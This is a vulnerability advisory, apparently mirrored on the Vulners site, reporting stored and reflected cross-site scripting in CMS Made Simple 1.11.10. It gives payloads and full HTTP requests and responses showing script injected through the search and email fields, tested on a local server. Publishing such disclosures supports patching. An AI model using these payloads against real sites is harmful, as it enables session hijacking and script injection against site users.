Vulners
Lucene search
CMS Made Simple 1.11.10 - Multiple Cross-Site Scripting Vulnerabilities
Exploit Title : CMS Made Simple 1.11.10 Multiple XSS Vulnerability
Google dork : N/A
Date : 02/04/2014
Exploit Author : Blessen Thomas
Vendor Homepage : http://www.cmsmadesimple.org/
Software Link : N/A
Version : 1.11.10
Tested on : Windows 7 hosted in WAMP server
Type of Application : open source content management system,
Stored XSS :
Login to the admin portal and access search functionality
http://localhost/cmsmadesimple-1.11.10-full/index.php
Here the " search " parameter is vulnerable to stored xss.
Payload :
'">><marquee><img src=x onerror=confirm(1)
request:
POST http://localhost/cmsmadesimple-1.11.10-full/ HTTP/1.1
Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0)
Gecko/20100101 Firefox/28.0 Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer:
http://localhost/cmsmadesimple-1.11.10-full/index.php Cookie:
_sx_=3ee623ee0900c03b; cms_admin_user_id=1;
cms_passhash=fcb88b76587f0658cd2481a004312918;
CMSSESSIDd508249c=qijlp266idmf9sjc51bai74lg7;
PHPSESSID=5fvasiledip329l0bhr2ulb1j0;
CMSSESSID7a29d042=qv3lpa3fpdflsmqac1icp5cfe7 Connection: keep-alive
Content-Type: application/x-www-form-urlencoded Content-Length: 153
mact=Search%2Ccntnt01%2Cdosearch%2C0&cntnt01returnid=15&cntnt01searchinput=%27%22%3E%3E%3Cmarquee%3E%3Cimg+src%3Dx+onerror%3Dconfirm%281%29&submit=Submit
response :
<div id="search" class="core-float-right">
'">><marquee><img src=x onerror=confirm(1)
</div>
<a href="http://localhost/cmsmadesimple-1.11.10-full/"
title="Home Page, shortcut key=1" >CMS Made Simple Site</a>
</div>
Reflected XSS :
Login to the admin portal and click the "My Preferences" and click "My
account" section.
Here , the "email address" parameter is vulnerable to reflected XSS.
Payload :
"";</script><script>alert(0)</script><"
request :
POST
http://127.0.0.1/cmsmadesimple-1.11.10-full/admin/myaccount.php?_sx_=1c8c76366630b299
HTTP/1.1
Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0)
Gecko/20100101 Firefox/28.0 Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer:
http://127.0.0.1/cmsmadesimple-1.11.10-full/admin/myaccount.php?_sx_=1c8c76366630b299Cookie:
_sx_=1c8c76366630b299; cms_admin_user_id=1;
cms_passhash=fcb88b76587f0658cd2481a004312918;
CMSSESSIDd508249c=71ougg9mi3ikiilatfc0851no5 Connection: keep-alive
Content-Type: application/x-www-form-urlencoded Content-Length: 103
active_tab=maintab&user=test&password=&passwordagain=&firstname=&lastname=&email="";</script><script>alert(0)</script><"&submit_account=Submit
response :
</aside> </div> <!-- end sidebar //--> <!-- start main
--> <div id="oe_mainarea" class="cf"> <aside class="message
pageerrorcontainer" role="alert"><p>The email address entered is
invalid: "";</script><script>alert(0)</script><"</p></aside><article
role="main" class="content-inner"><header class="pageheader
cf"><h1>My Account</h1><script type="text/javascript">Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Apr 2014 00:00Current